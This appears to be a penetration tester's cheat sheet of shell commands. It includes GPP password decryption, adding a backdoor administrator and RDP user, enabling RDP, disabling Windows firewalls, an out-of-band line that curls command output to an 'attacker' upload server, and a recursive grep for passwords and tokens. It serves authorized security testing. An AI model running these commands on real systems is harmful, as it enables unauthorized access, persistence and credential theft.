Useful commands

Windows & AD

# Decrypt GPP AES-256 encrypted password
gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

# Domain account policy
net accounts

# Add a local user and add it to administrators group
net user hunter Security@123 /add                 # Add user
net localgroup administrators hunter /add         # Add user to administrators  group
net localgroup 'Remote Desktop Users' hunter /add # Add user to RDU group

# Enable RDP remote access.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# allow through firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Turn Off Firewalls
netsh advfirewall set allprofiles state off

Tcpdump

# Filter output with the source, destination and port
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap

sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap

Python

python3 -m venv .
source ./bin/activate
pip install aerospike

Open Ports

# Linux
netstat -tulnp                # Show with process IDs
netstat -anp | grep LISTEN    # Filter for listening ports
ss -tulnp                     # Show with process info
# Windows cmd
netstat -an | find "LISTEN"
netstat -an | findstr LISTENING
netstat -ano                  # Show all with PID
# Windows PS
Get-NetTCPConnection | Where-Object {$_.State -eq "Listen"} | Select-Object LocalAddress, LocalPort
Get-NetUDPEndpoint | Select-Object LocalAddress, LocalPort    # Show all active UDP ports

OOB

# start upload server
python3 -m uploadserver 8080
# Send output of a command to attacker
command &> /tmp/output; curl --data @/tmp/output http://127.0.0.1:8080/upload
# monitor trafic on localhost port 8080
sudo tcpdump -nvvvXi lo tcp port 8080

Automation

# Bash for loop
for line in $(cat "$1"); do echo "$line"; done
while IFS= read -r line; do echo "$line"; done < "$1"
# PS loop
Get-Content $args[0] | ForEach-Object { Write-Output $_ }
# Python for loop
import sys
with open(sys.argv[1]) as f:
    for line in f:
        print(line.strip())

Looking for creds

# Looking for creds
grep -rinE '(password|username|user|pass|key|token|secret|admin|login|credentials)'